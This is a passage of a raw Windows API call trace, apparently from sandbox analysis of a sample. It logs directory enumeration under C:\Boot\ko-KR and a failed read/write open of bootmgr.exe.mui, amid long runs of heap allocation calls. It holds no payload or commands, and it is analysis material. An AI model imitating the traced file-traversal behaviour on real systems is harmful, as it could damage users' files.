ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.596] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.596] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced80 [0201.596] PathFindExtensionW (pszPath="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned=".mui" [0201.596] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced80 | out: hHeap=0x2c0000) returned 1 [0201.597] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.597] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.597] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.597] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0201.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 